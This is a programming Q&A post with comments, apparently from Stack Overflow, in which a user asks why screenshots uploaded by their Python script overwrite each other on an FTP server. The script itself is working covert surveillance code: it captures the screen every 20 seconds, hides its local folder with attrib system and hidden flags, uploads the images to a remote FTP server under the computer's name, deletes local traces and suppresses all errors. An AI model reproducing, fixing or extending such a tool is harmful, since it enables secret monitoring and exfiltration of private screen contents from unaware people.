# How to store multiple images in the same directory, on an FTP server?

Tags: python, ftp

This python script takes screenshots at certain intervals, and stores it in specific directory locally. It then uploads it to an ftp server, and removes it from the local directory. The problem is that, when the script uploads to the FTP server, the existing image is replaced. Is it possible to have all images on the server at the same time?

`import autopy
import time
import os
import ftplib
delay_time=20   # time interval between screen_shoots

##############function for deleting file in specified path if found#########
def delet_file(dirr,nam):
    if os.path.isfile(dirr+nam):
        try:
            os.remove(dirr+nam)
        except:
            pass
        return None

#############Function for uploading your file to FTP server#############
def ftp_upload(Host,User,User_pass,ftp_dir,loca_dir,fil):
    try:
        con=con=ftplib.FTP(Host)
        con.login(User,User_pass)
        try:
            con.mkd(ftp_dir)
            con.cwd(ftp_dir)
            f=open(loca_dir+fil,'rb')
            con.storbinary("STOR "+fil,f)
            f.close()
            con.quit()
            delet_file(loca_dir,fil)

        except:
            con.cwd(ftp_dir)
            f=open(loca_dir+fil,'rb')
            con.storbinary("STOR "+fil,f)
            f.close()
            con.quit()
            delet_file(loca_dir,fil)
    except:
        pass
    return None

######## Function for generating unique image name##################
def getfile_name():
    image_name=(time.asctime().replace(" ","_")).replace(":","")+".png"
    return image_name

##############function for generating and returning path in local computer#########
def generat_path():
    dir_name=os.environ["TMP"]+os.sep+os.environ["USERNAME"]+"psc"+os.sep
    try:
        if os.path.isdir(dir_name):
            os.popen("attrib +s +h +r " +dir_name)
        else:
            os.mkdir(dir_name)
            os.popen("attrib +s +h +r " +dir_name)
    except:
            pass

    return dir_name

########################### main function to take  screen shoot and save it#########
def capture_shoot(full_path):
    try:

        z=autopy.bitmap.capture_screen()
        z.save(full_path)
    except :
        pass
    return None

###########from here start your script###################3
def start():
    ftp_dir=os.environ["COMPUTERNAME"] #get computer name
    #######set your  ftp server data #######
    ####### make  your own ( _ ) #########
    host=''  #host name
    passwd=''        #Password for ftp server
    login_id=''       #username for ftp server
    ########## loop in the script and excuting every interval########
    while True :
        image_name=getfile_name()
        local_dir=generat_path()
        capture_shoot(local_dir+image_name)
        ftp_upload(host,login_id,passwd,ftp_dir,local_dir,image_name)

        time.sleep(delay_time)


 ### this mean if you import script as module don't
 #### excute and return false elseif excuted as script  impliment start 

if __name__=='__main__':
    start()
<code>`

#####################thanks very much#############################

Comment: There is a reason new users aren't permitted to paste a lot of code in their question. You should pare your code down to a [mcve], not insert filler into your question until the system permits you to post it.

Comment: I do not see anything in your code that would replace the previous image (unless you upload more frequently than once per second). Though as Keikki mentioned, you should post MCVE to make it clearer. - Anyway, how do you test that the previous image was replaced? Can you upload (and keep) multiple images on the FTP server manually using any standalone FTP client?

Comment: Grammatical improvements

Comment: i uploaded it on http://panel.byethost.com but once one image uploading second image replace it

Comment: Sorry, but your comment is pretty unclear and does not really explain anything.

Comment: sorry because I am not good in English , but I want to mention that this code take screen shoots efficiency and store them in my local computer too , but when  I open my account in   byethost.com (FTP) to get  uploading images ,I  find   only one  image and while  refreshing  the website,I find  my image  is replaced with anothor uploaded image